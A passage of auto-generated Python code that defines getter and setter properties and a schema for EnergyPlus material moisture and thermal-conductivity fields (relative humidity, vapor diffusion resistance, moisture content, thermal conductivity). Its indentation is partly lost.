def relative_humidity_fraction_9(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 9`"""
self["Relative Humidity Fraction 9"] = value
@property
def water_vapor_diffusion_resistance_factor_9(self):
"""field `Water Vapor Diffusion Resistance Factor 9`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_9` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 9"]
@water_vapor_diffusion_resistance_factor_9.setter
def water_vapor_diffusion_resistance_factor_9(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
9`"""
self["Water Vapor Diffusion Resistance Factor 9"] = value
@property
def relative_humidity_fraction_10(self):
"""field `Relative Humidity Fraction 10`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_10` or None if not set
"""
return self["Relative Humidity Fraction 10"]
@relative_humidity_fraction_10.setter
def relative_humidity_fraction_10(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 10`"""
self["Relative Humidity Fraction 10"] = value
@property
def water_vapor_diffusion_resistance_factor_10(self):
"""field `Water Vapor Diffusion Resistance Factor 10`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_10` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 10"]
@water_vapor_diffusion_resistance_factor_10.setter
def water_vapor_diffusion_resistance_factor_10(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
10`"""
self["Water Vapor Diffusion Resistance Factor 10"] = value
@property
def relative_humidity_fraction_11(self):
"""field `Relative Humidity Fraction 11`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_11` or None if not set
"""
return self["Relative Humidity Fraction 11"]
@relative_humidity_fraction_11.setter
def relative_humidity_fraction_11(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 11`"""
self["Relative Humidity Fraction 11"] = value
@property
def water_vapor_diffusion_resistance_factor_11(self):
"""field `Water Vapor Diffusion Resistance Factor 11`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_11` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 11"]
@water_vapor_diffusion_resistance_factor_11.setter
def water_vapor_diffusion_resistance_factor_11(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
11`"""
self["Water Vapor Diffusion Resistance Factor 11"] = value
@property
def relative_humidity_fraction_12(self):
"""field `Relative Humidity Fraction 12`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_12` or None if not set
"""
return self["Relative Humidity Fraction 12"]
@relative_humidity_fraction_12.setter
def relative_humidity_fraction_12(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 12`"""
self["Relative Humidity Fraction 12"] = value
@property
def water_vapor_diffusion_resistance_factor_12(self):
"""field `Water Vapor Diffusion Resistance Factor 12`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_12` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 12"]
@water_vapor_diffusion_resistance_factor_12.setter
def water_vapor_diffusion_resistance_factor_12(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
12`"""
self["Water Vapor Diffusion Resistance Factor 12"] = value
@property
def relative_humidity_fraction_13(self):
"""field `Relative Humidity Fraction 13`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_13` or None if not set
"""
return self["Relative Humidity Fraction 13"]
@relative_humidity_fraction_13.setter
def relative_humidity_fraction_13(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 13`"""
self["Relative Humidity Fraction 13"] = value
@property
def water_vapor_diffusion_resistance_factor_13(self):
"""field `Water Vapor Diffusion Resistance Factor 13`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_13` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 13"]
@water_vapor_diffusion_resistance_factor_13.setter
def water_vapor_diffusion_resistance_factor_13(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
13`"""
self["Water Vapor Diffusion Resistance Factor 13"] = value
@property
def relative_humidity_fraction_14(self):
"""field `Relative Humidity Fraction 14`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_14` or None if not set
"""
return self["Relative Humidity Fraction 14"]
@relative_humidity_fraction_14.setter
def relative_humidity_fraction_14(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 14`"""
self["Relative Humidity Fraction 14"] = value
@property
def water_vapor_diffusion_resistance_factor_14(self):
"""field `Water Vapor Diffusion Resistance Factor 14`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_14` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 14"]
@water_vapor_diffusion_resistance_factor_14.setter
def water_vapor_diffusion_resistance_factor_14(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
14`"""
self["Water Vapor Diffusion Resistance Factor 14"] = value
@property
def relative_humidity_fraction_15(self):
"""field `Relative Humidity Fraction 15`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_15` or None if not set
"""
return self["Relative Humidity Fraction 15"]
@relative_humidity_fraction_15.setter
def relative_humidity_fraction_15(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 15`"""
self["Relative Humidity Fraction 15"] = value
@property
def water_vapor_diffusion_resistance_factor_15(self):
"""field `Water Vapor Diffusion Resistance Factor 15`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_15` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 15"]
@water_vapor_diffusion_resistance_factor_15.setter
def water_vapor_diffusion_resistance_factor_15(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
15`"""
self["Water Vapor Diffusion Resistance Factor 15"] = value
@property
def relative_humidity_fraction_16(self):
"""field `Relative Humidity Fraction 16`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_16` or None if not set
"""
return self["Relative Humidity Fraction 16"]
@relative_humidity_fraction_16.setter
def relative_humidity_fraction_16(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 16`"""
self["Relative Humidity Fraction 16"] = value
@property
def water_vapor_diffusion_resistance_factor_16(self):
"""field `Water Vapor Diffusion Resistance Factor 16`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_16` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 16"]
@water_vapor_diffusion_resistance_factor_16.setter
def water_vapor_diffusion_resistance_factor_16(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
16`"""
self["Water Vapor Diffusion Resistance Factor 16"] = value
@property
def relative_humidity_fraction_17(self):
"""field `Relative Humidity Fraction 17`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_17` or None if not set
"""
return self["Relative Humidity Fraction 17"]
@relative_humidity_fraction_17.setter
def relative_humidity_fraction_17(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 17`"""
self["Relative Humidity Fraction 17"] = value
@property
def water_vapor_diffusion_resistance_factor_17(self):
"""field `Water Vapor Diffusion Resistance Factor 17`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_17` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 17"]
@water_vapor_diffusion_resistance_factor_17.setter
def water_vapor_diffusion_resistance_factor_17(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
17`"""
self["Water Vapor Diffusion Resistance Factor 17"] = value
@property
def relative_humidity_fraction_18(self):
"""field `Relative Humidity Fraction 18`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_18` or None if not set
"""
return self["Relative Humidity Fraction 18"]
@relative_humidity_fraction_18.setter
def relative_humidity_fraction_18(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 18`"""
self["Relative Humidity Fraction 18"] = value
@property
def water_vapor_diffusion_resistance_factor_18(self):
"""field `Water Vapor Diffusion Resistance Factor 18`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_18` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 18"]
@water_vapor_diffusion_resistance_factor_18.setter
def water_vapor_diffusion_resistance_factor_18(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
18`"""
self["Water Vapor Diffusion Resistance Factor 18"] = value
@property
def relative_humidity_fraction_19(self):
"""field `Relative Humidity Fraction 19`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_19` or None if not set
"""
return self["Relative Humidity Fraction 19"]
@relative_humidity_fraction_19.setter
def relative_humidity_fraction_19(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 19`"""
self["Relative Humidity Fraction 19"] = value
@property
def water_vapor_diffusion_resistance_factor_19(self):
"""field `Water Vapor Diffusion Resistance Factor 19`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_19` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 19"]
@water_vapor_diffusion_resistance_factor_19.setter
def water_vapor_diffusion_resistance_factor_19(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
19`"""
self["Water Vapor Diffusion Resistance Factor 19"] = value
@property
def relative_humidity_fraction_20(self):
"""field `Relative Humidity Fraction 20`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_20` or None if not set
"""
return self["Relative Humidity Fraction 20"]
@relative_humidity_fraction_20.setter
def relative_humidity_fraction_20(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 20`"""
self["Relative Humidity Fraction 20"] = value
@property
def water_vapor_diffusion_resistance_factor_20(self):
"""field `Water Vapor Diffusion Resistance Factor 20`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_20` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 20"]
@water_vapor_diffusion_resistance_factor_20.setter
def water_vapor_diffusion_resistance_factor_20(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
20`"""
self["Water Vapor Diffusion Resistance Factor 20"] = value
@property
def relative_humidity_fraction_21(self):
"""field `Relative Humidity Fraction 21`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_21` or None if not set
"""
return self["Relative Humidity Fraction 21"]
@relative_humidity_fraction_21.setter
def relative_humidity_fraction_21(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 21`"""
self["Relative Humidity Fraction 21"] = value
@property
def water_vapor_diffusion_resistance_factor_21(self):
"""field `Water Vapor Diffusion Resistance Factor 21`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_21` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 21"]
@water_vapor_diffusion_resistance_factor_21.setter
def water_vapor_diffusion_resistance_factor_21(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
21`"""
self["Water Vapor Diffusion Resistance Factor 21"] = value
@property
def relative_humidity_fraction_22(self):
"""field `Relative Humidity Fraction 22`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_22` or None if not set
"""
return self["Relative Humidity Fraction 22"]
@relative_humidity_fraction_22.setter
def relative_humidity_fraction_22(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 22`"""
self["Relative Humidity Fraction 22"] = value
@property
def water_vapor_diffusion_resistance_factor_22(self):
"""field `Water Vapor Diffusion Resistance Factor 22`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_22` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 22"]
@water_vapor_diffusion_resistance_factor_22.setter
def water_vapor_diffusion_resistance_factor_22(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
22`"""
self["Water Vapor Diffusion Resistance Factor 22"] = value
@property
def relative_humidity_fraction_23(self):
"""field `Relative Humidity Fraction 23`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_23` or None if not set
"""
return self["Relative Humidity Fraction 23"]
@relative_humidity_fraction_23.setter
def relative_humidity_fraction_23(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 23`"""
self["Relative Humidity Fraction 23"] = value
@property
def water_vapor_diffusion_resistance_factor_23(self):
"""field `Water Vapor Diffusion Resistance Factor 23`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_23` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 23"]
@water_vapor_diffusion_resistance_factor_23.setter
def water_vapor_diffusion_resistance_factor_23(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
23`"""
self["Water Vapor Diffusion Resistance Factor 23"] = value
@property
def relative_humidity_fraction_24(self):
"""field `Relative Humidity Fraction 24`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_24` or None if not set
"""
return self["Relative Humidity Fraction 24"]
@relative_humidity_fraction_24.setter
def relative_humidity_fraction_24(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 24`"""
self["Relative Humidity Fraction 24"] = value
@property
def water_vapor_diffusion_resistance_factor_24(self):
"""field `Water Vapor Diffusion Resistance Factor 24`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_24` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 24"]
@water_vapor_diffusion_resistance_factor_24.setter
def water_vapor_diffusion_resistance_factor_24(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
24`"""
self["Water Vapor Diffusion Resistance Factor 24"] = value
@property
def relative_humidity_fraction_25(self):
"""field `Relative Humidity Fraction 25`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_25` or None if not set
"""
return self["Relative Humidity Fraction 25"]
@relative_humidity_fraction_25.setter
def relative_humidity_fraction_25(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 25`"""
self["Relative Humidity Fraction 25"] = value
@property
def water_vapor_diffusion_resistance_factor_25(self):
"""field `Water Vapor Diffusion Resistance Factor 25`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_25` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 25"]
@water_vapor_diffusion_resistance_factor_25.setter
def water_vapor_diffusion_resistance_factor_25(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
25`"""
self["Water Vapor Diffusion Resistance Factor 25"] = value
class MaterialPropertyHeatAndMoistureTransferThermalConductivity(DataObject):

    """ Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:ThermalConductivity`
        HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
        Relationship between thermal conductivity and moisture content
        Has no effect with other HeatBalanceAlgorithm solution algorithms
    """

    # The per-coordinate field metadata is perfectly regular for
    # coordinates 1..25, so the field OrderedDict is generated here
    # instead of being written out literally.  Keys, key order, and every
    # per-field attribute match the hand-expanded form exactly (only
    # coordinate 1 is a required field).
    def _build_schema_fields():
        fields = [
            (u'material name',
             {'name': u'Material Name',
              'pyname': u'material_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'number of thermal coordinates',
             {'name': u'Number of Thermal Coordinates',
              'pyname': u'number_of_thermal_coordinates',
              'maximum': 25,
              'required-field': True,
              'autosizable': False,
              'minimum': 1,
              'autocalculatable': False,
              'type': u'integer'}),
        ]
        for i in range(1, 26):
            fields.append(
                (u'moisture content %d' % i,
                 {'name': u'Moisture Content %d' % i,
                  'pyname': u'moisture_content_%d' % i,
                  'required-field': i == 1,
                  'autosizable': False,
                  'minimum': 0.0,
                  'autocalculatable': False,
                  'type': 'real',
                  'unit': u'kg/m3'}))
            fields.append(
                (u'thermal conductivity %d' % i,
                 {'name': u'Thermal Conductivity %d' % i,
                  'pyname': u'thermal_conductivity_%d' % i,
                  'minimum>': 0.0,
                  'required-field': i == 1,
                  'autosizable': False,
                  'autocalculatable': False,
                  'type': 'real',
                  'unit': u'W/m-K'}))
        return OrderedDict(fields)

    _schema = {'extensible-fields': OrderedDict(),
               'fields': _build_schema_fields(),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'MaterialProperty:HeatAndMoistureTransfer:ThermalConductivity',
               'pyname': u'MaterialPropertyHeatAndMoistureTransferThermalConductivity',
               'required-object': False,
               'unique-object': False}

    # Remove the builder so the class namespace matches the original
    # (no extra attribute is left behind).
    del _build_schema_fields
@property
def material_name(self):
"""field `Material Name`
| Moisture Material Name that the Thermal Conductivity will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_thermal_coordinates(self):
"""field `Number of Thermal Coordinates`
| number of data coordinates
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Thermal Coordinates`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_thermal_coordinates` or None if not set
"""
return self["Number of Thermal Coordinates"]
@number_of_thermal_coordinates.setter
def number_of_thermal_coordinates(self, value=None):
"""Corresponds to IDD field `Number of Thermal Coordinates`"""
self["Number of Thermal Coordinates"] = value
@property
def moisture_content_1(self):
"""field `Moisture Content 1`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_1` or None if not set
"""
return self["Moisture Content 1"]
@moisture_content_1.setter
def moisture_content_1(self, value=None):
"""Corresponds to IDD field `Moisture Content 1`"""
self["Moisture Content 1"] = value
@property
def thermal_conductivity_1(self):
"""field `Thermal Conductivity 1`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_1` or None if not set
"""
return self["Thermal Conductivity 1"]
@thermal_conductivity_1.setter
def thermal_conductivity_1(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 1`"""
self["Thermal Conductivity 1"] = value
@property
def moisture_content_2(self):
    """Return IDD field `Moisture Content 2` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 2"]

@moisture_content_2.setter
def moisture_content_2(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 2`."""
    self["Moisture Content 2"] = value

@property
def thermal_conductivity_2(self):
    """Return IDD field `Thermal Conductivity 2` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 2"]

@thermal_conductivity_2.setter
def thermal_conductivity_2(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 2`."""
    self["Thermal Conductivity 2"] = value
@property
def moisture_content_3(self):
    """Return IDD field `Moisture Content 3` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 3"]

@moisture_content_3.setter
def moisture_content_3(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 3`."""
    self["Moisture Content 3"] = value

@property
def thermal_conductivity_3(self):
    """Return IDD field `Thermal Conductivity 3` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 3"]

@thermal_conductivity_3.setter
def thermal_conductivity_3(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 3`."""
    self["Thermal Conductivity 3"] = value
@property
def moisture_content_4(self):
    """Return IDD field `Moisture Content 4` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 4"]

@moisture_content_4.setter
def moisture_content_4(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 4`."""
    self["Moisture Content 4"] = value

@property
def thermal_conductivity_4(self):
    """Return IDD field `Thermal Conductivity 4` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 4"]

@thermal_conductivity_4.setter
def thermal_conductivity_4(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 4`."""
    self["Thermal Conductivity 4"] = value
@property
def moisture_content_5(self):
    """Return IDD field `Moisture Content 5` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 5"]

@moisture_content_5.setter
def moisture_content_5(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 5`."""
    self["Moisture Content 5"] = value

@property
def thermal_conductivity_5(self):
    """Return IDD field `Thermal Conductivity 5` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 5"]

@thermal_conductivity_5.setter
def thermal_conductivity_5(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 5`."""
    self["Thermal Conductivity 5"] = value
@property
def moisture_content_6(self):
    """Return IDD field `Moisture Content 6` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 6"]

@moisture_content_6.setter
def moisture_content_6(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 6`."""
    self["Moisture Content 6"] = value

@property
def thermal_conductivity_6(self):
    """Return IDD field `Thermal Conductivity 6` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 6"]

@thermal_conductivity_6.setter
def thermal_conductivity_6(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 6`."""
    self["Thermal Conductivity 6"] = value
@property
def moisture_content_7(self):
    """Return IDD field `Moisture Content 7` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 7"]

@moisture_content_7.setter
def moisture_content_7(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 7`."""
    self["Moisture Content 7"] = value

@property
def thermal_conductivity_7(self):
    """Return IDD field `Thermal Conductivity 7` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 7"]

@thermal_conductivity_7.setter
def thermal_conductivity_7(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 7`."""
    self["Thermal Conductivity 7"] = value
@property
def moisture_content_8(self):
    """Return IDD field `Moisture Content 8` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 8"]

@moisture_content_8.setter
def moisture_content_8(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 8`."""
    self["Moisture Content 8"] = value

@property
def thermal_conductivity_8(self):
    """Return IDD field `Thermal Conductivity 8` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 8"]

@thermal_conductivity_8.setter
def thermal_conductivity_8(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 8`."""
    self["Thermal Conductivity 8"] = value
@property
def moisture_content_9(self):
    """Return IDD field `Moisture Content 9` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 9"]

@moisture_content_9.setter
def moisture_content_9(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 9`."""
    self["Moisture Content 9"] = value

@property
def thermal_conductivity_9(self):
    """Return IDD field `Thermal Conductivity 9` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 9"]

@thermal_conductivity_9.setter
def thermal_conductivity_9(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 9`."""
    self["Thermal Conductivity 9"] = value
@property
def moisture_content_10(self):
    """Return IDD field `Moisture Content 10` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 10"]

@moisture_content_10.setter
def moisture_content_10(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 10`."""
    self["Moisture Content 10"] = value

@property
def thermal_conductivity_10(self):
    """Return IDD field `Thermal Conductivity 10` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 10"]

@thermal_conductivity_10.setter
def thermal_conductivity_10(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 10`."""
    self["Thermal Conductivity 10"] = value
@property
def moisture_content_11(self):
    """Return IDD field `Moisture Content 11` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 11"]

@moisture_content_11.setter
def moisture_content_11(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 11`."""
    self["Moisture Content 11"] = value

@property
def thermal_conductivity_11(self):
    """Return IDD field `Thermal Conductivity 11` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 11"]

@thermal_conductivity_11.setter
def thermal_conductivity_11(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 11`."""
    self["Thermal Conductivity 11"] = value
@property
def moisture_content_12(self):
    """Return IDD field `Moisture Content 12` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 12"]

@moisture_content_12.setter
def moisture_content_12(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 12`."""
    self["Moisture Content 12"] = value

@property
def thermal_conductivity_12(self):
    """Return IDD field `Thermal Conductivity 12` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 12"]

@thermal_conductivity_12.setter
def thermal_conductivity_12(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 12`."""
    self["Thermal Conductivity 12"] = value
@property
def moisture_content_13(self):
    """Return IDD field `Moisture Content 13` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 13"]

@moisture_content_13.setter
def moisture_content_13(self, value=None):
